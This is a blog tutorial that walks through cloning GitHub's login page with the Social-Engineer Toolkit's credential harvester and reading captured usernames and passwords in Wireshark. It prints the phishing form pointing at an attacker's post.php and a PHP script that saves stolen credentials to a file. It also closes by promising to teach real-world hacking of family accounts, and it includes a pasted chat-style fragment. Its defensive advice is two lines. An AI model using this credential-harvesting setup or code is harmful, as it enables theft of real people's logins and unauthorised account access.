Open in app

Sign in

Write

Sign in

Phish like a Phisher, Defend like a Guardian.

Abdul Basit Rotimi
6 min readSep 20, 2024

--

This content focuses on hardening our security environment against one of the world’s most powerful attack vectors: SOCIAL ENGINEERING. I’ll be guiding you on how to create malicious webpages to test yourself (or family) and enhance your security posture.

Disclaimer: This is for educational purposes only.

My definition of Cybersecurity is: Intention

This blog is for everyone. Try it out for yourself, but remember not to hack others. As I mentioned, Cybersecurity is intention.

What do i need to phish like a phisher:

  1. Internet connectivity
  2. Kali Linux
  3. Mobile Phone
  4. Wireshark
  5. Good mind

That’s all that you will need to phish like a phisher. What about defend like a Guardian.

  1. Creativity
  2. Think outside the box
  3. Awareness.

Let’s GO

Before you start, grab your water or coffee beside you and relax, We are learning together!

Spin up your kali linux VM(Virtual Machine).

My Kali desktop page.

Now, navigate to your linux terminal.

This is the Linux terminal

We need to switch to the root user, which is a superuser, by typing the command sudo su. This means 'superuser do' to switch to the root user. You may be prompted to enter a password, depending on your configuration setup

I’m now a SuperMAN

Is that all? No!

We need to use a tool called the Social-Engineer Toolkit (SET). A big shoutout to David Kennedy and his team for creating this amazing tool.

Type <setoolkit>, hit Enter, and take a sip of water.

You will see this interface.

Hmm! What are your initial thoughts about this tool? Feel free to comment.

If you’re experiencing any issues with the tool, follow this link for installation guidance.

This is where the power lies.

I won’t go into further detail about the options shown above. Remember, The tool is capable of doing things you might not consider.

Now, press ‘1’ on your keyboard and take a coffee break.

Ask yourself what does it take to be a phisher?

As I mentioned earlier, ‘The tool is capable of doing things you might not think of.’ Now, please press ‘2’ on your keyboard.’

Read up those text to understand how it works.

We are selecting option “3” which is a Credential Harvester, because we want to phish like a phisher.

Are you now thinking like a Badass Hacker?

We are using option “2” this will be cloning any website login of your choice.

What is this?

Just press the Enter key if you have your IP (Internet Protocol) address. Otherwise, type in your machine’s IP address

Yes, We got this.

Choose any website, preferably a login page. In my case, I’ll use ‘https://github.com/login/'. Press Enter, and take a sip of water while you wait.

Something like this might comes up.

The information in the image is telling us the path to find our document. hit enter.

You are bit step to a Phisher.

Now we need to spin up Wireshark to monitor the packet traffic and listen for information from our victim.

Double click on wireshark icon.
I believe you are here.

eth0 stands for ‘Ethernet 0,’ which refers to the connection you want to monitor. If you’re using Bluetooth or another address, simply double-click on the floating graph for eth0 and wait.”

Before you double click the eth0, Open browser of your choice in my case i’m using Mozilla Firefox.

This is cool guys.

In our browser URL (Uniform Resource Link) area, Type the IP address of your provided in the setoolkit terminal.

Who are you now?

We are trying to think like a hacker at the same time we are creating awareness for everyone out there to be conscious of potential attack vector.

Let’s go back to wireshark to monitor our packets activities.

Double Click on the eth0.
You should find yourself here.

We’ll monitor our victim information submitted on the login page.

Click on Sign in

I can’t wait to phish the victim information.

Oops!!!

The page was redirected to the real GitHub page.

Let’s dig out the information with Wireshark, type the information filter command <http> in the wireshark interface.

We got this.

Right click on the POST packet.

Two Options

Click on the Follow, There’s two option to select the TCP(Transmission Control Protocol) stream and HTTP (Hyper Text Transfer Protocol) stream. Click on the HTTP stream.

You are now a badass Social Engineer.

We have obtained the victim’s username and password.

Let’s quickly dive into secret code that help us capture the victim’s credentials.

Right click on this page.

View the page source, and you’ll see a series of codes. It may look messy, but I will teach you how to investigate it.

I’m scared.

Now that you’re in the page source, press Ctrl + F on your keyboard. This command allows you to find specific text or words on the page or in the document.

I searched PHP, This is dreadful. Below is the code injected into the GitHub page. This form submits the credentials to post.php, which presumably captures the information for storage on the server.

<form data-turbo="false" action="http://192. /post.php" method="post">
  <input type="hidden" name="authenticity_token" value="OMWymZhkKrcBFQxfbIC1HCgNoPZiGmtf6KwmQp8hfiXUwy+p7n4YCKJ948/2n+Ka3JYF/vpbWwLusNOe5Vsgqg==" />
  <input type="hidden" name="add_account" id="add_account" autocomplete="off" class="form-control" />
  
  <label for="login_field">Username or email address</label>
  <input type="text" name="login" id="login_field" class="form-control input-block" required />

  <label for="password">Password</label>
  <input type="password" name="password" id="password" class="form-control" required />

  <input type="submit" name="commit" value="Sign in" class="btn btn-primary btn-block" />
</form>

If you are looking for how to save this information in a document or database on the server, you would need to modify the server-side script (in post.php) to handle that task. Example you can write the submitted data to a file like this (in PHP)

<?php
  $username = $_POST['login'];
  $password = $_POST['password'];

  // Save data to a text file
  $file = 'credentials.txt';
  $data = "Username: $username, Password: $password\n";
  file_put_contents($file, $data, FILE_APPEND);
?>

Let’s compare the script on the real GitHub page

<form data-turbo="false" action="/session" accept-charset="UTF-8" method="post">

The file you uploaded contains HTML for a GitHub login page, but it does not include any reference to a post.php file in its form actions. The form method is set to submit to /session as seen here:

<form data-turbo="false" action="/session" accept-charset="UTF-8" method="post">

There is no mention of post.php in the provided document. If you're looking to simulate sending credentials to a specific PHP file (like post.php), you would need to modify the action attribute of the form to point to post.php instead. Here's an example of how it would look:

<form data-turbo="false" action="http://your-server-ip/post.php" accept-charset="UTF-8" method="post">

This would then submit the form data to post.php on your server.

Yes, We are now a phisher.

Takeaway:

  1. Don’t just click a link.
  2. Verify the source.

“What do you think about my writing style?”

Clap for yourself, practice this…. In my next blog post i will teach how to do this in a real world scenarios which you’ll hack you family accounts and you’ll educate them. “Cybersecurity is Intention”

Don’t forget it’s your gUy — Abdul Basit Rotimi

follow me for more cybersecurity contents.

Social Engineering
Cybersecurity
Phishing
Hacking
Awareness

--

--

Abdul Basit Rotimi
Abdul Basit Rotimi

Written by Abdul Basit Rotimi

25 Followers
27 Following

Abdul Basit is a seasoned cybersecurity analyst loved to provide security solutions to attack victims.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams